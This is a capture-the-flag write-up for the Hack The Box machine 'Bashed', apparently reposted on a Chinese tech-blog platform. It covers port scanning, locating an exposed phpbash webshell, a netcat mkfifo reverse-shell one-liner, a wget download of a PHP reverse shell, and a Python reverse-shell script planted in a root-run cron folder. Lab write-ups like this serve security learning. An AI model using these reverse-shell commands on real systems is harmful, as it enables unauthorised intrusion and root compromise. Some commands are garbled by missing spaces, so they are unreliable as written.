专栏首页madMenBashed -- hack the box

Bashed -- hack the box

Introduction

Target: 10.10.10.68 (OS: Linux)

Kali linux: 10.10.16.44

Information Enumeration

Firstly, detect the open ports:

# Nmap 7.70 scan initiated Wed Apr 3 20:48:43 2019 as: nmap -sT -p- --min-rate 10000 -oA openports 10.10.10.68
Warning: 10.10.10.68 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.68
Host is up (0.31s latency).
Not shown: 39680 closed ports, 25854 filtered ports
PORT STATE SERVICE
80/tcp open http

Only port 80 is open, it may be an easy box. And the truth is that it is really an easy box.

Then, detect the service of the port 80, it may be a kind of http service.

# Nmap 7.70 scan initiated Wed Apr 3 20:55:27 2019 as: nmap -sC -sV -p 80 -oA services 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.35s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Nothing special. Then access the http service and find more.

Exploit

Http

Access to http://10.10.10.68, and it seems to be a simple blog which talks about phpbash.

phpbash seems to be a webshell tool. And there is a github repository phpbash introduces the tool. The introduction of the repo is to drop the file to target and access it by http://ip/uploads/phpbash.php. Try to access http://10.10.10.68/uploads/phpbash.php. But the file seems not to be here.

Utilize the dirbuster to enumerate the directories.

Wow. Find it and open the file phpbash.php. Here is the webshell. I have tried to reverse shell by rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|nc10.10.16.441234>/tmp/f. But the shell cannot be returned. Whatever, I can obtain the user.txt.

It is convenient to get the reverse shell. So I try to upload a php shell to the target machine. The detailed php script can be found here. And I server the php script by python-mSimpleHTTPServer80. Then download the php script from the target machine. To ensure the script can be written to the target machine. Select a path can be written, for example: /tmp.

wget http://10.10.16.44/php-reverse-shell.php

Then in the kali, set the nc listen to port 1234:

nc-lvnp1234

Execute the php script in the target machine php php-reverse-shell.php. OK. We obtain the reverse shell.

Privilege escalation

Obtain the user permission is quite easy, and it is not difficult to obtain the root permission. Utilize sudo-l to see the permissions of the user. Something interesting found. We can switch to scriptmanager user without password.

su -u scrriptmanager bash -i

Try to enumerate the files. And I find an interesting folder inside /scripts. There are two files test.py and test.txt. Try to display the content of test.py.

The python script is quite straightforward. It just writes testing123! to the file test.txt. And if we see the attributes of test.txt, the modified time of the file changes each minute. And the file is owned by root. It seems that root will execute the python scripts in /scriptsfolder each minute. So utilize a python script to reverse the root shell(according to the information above, the python version of the target machine is 2.7):

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.44",4444));
os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

Set the kali listen to port 4444. Download the python script in the target machine and execute. Now, root shell is obtained.

本文分享自微信公众号 - madMen(mad_coder),作者:madneal

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-04-04

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Cronos -- hack the box

    3 ports is open, detect the detailed services:

    madneal
  • Help - hack the box

    To be honest, Help is not a difficult box. But there are some rabbit holes in th...

    madneal
  • Holiday -- hack the box

    Holiday is an insane box officially. It's really difficult to get the user permi...

    madneal
  • A Cold Dive into React Native (Tutorial for Beginners)

    原文:A Cold Dive into React Native (Tutorial for Beginners)

    汐楓
  • go http 服务器编程(2)

    match 会遍历路由信息字典,找到所有匹配该路径最长的那个。路由部分的代码解释就到这里了,最后回答上面的一个问题:http.HandleFunc 和 Serv...

    李海彬
  • phantomjs API 中文版 无界面浏览器 js处理的爬虫

    phantomjs [options] somescript.js [arg1 [arg2 […]]]

    十四君
  • 关于db_files和maxdatafiles的问题(r4笔记第31天)

    昨天在做生产监控的时候发现有个库的表空间不够了,就发邮件给客户的dba去处理,但是得到的反馈是尝试添加的时候发现已经超过了数据文件的最大数限制。这个错误毫无疑问...

    jeanron100
  • ReentrantLock 实现原理笔记(一)

    singleThreadSum: 20000100000 multiThreadSumNoLock:19496951532 multiThreadSumUs...

    一个会写诗的程序员
  • SAP S/4HANA里如何创建Customer主数据以及执行后续处理

    1, Launch tcode: BP and select the Organization 2, Maintain the information for...

    Jerry Wang
  • “我比Goodfellow提前三年想到了GAN”

    2014年的一晚,Ian Goodfellow和一个刚刚毕业的博士生一起喝酒庆祝。在蒙特利尔一个酒吧,一些朋友希望他能帮忙看看手头上一个棘手的项目:计算机如何自...

    大数据文摘

扫码关注云+社区

领取腾讯云代金券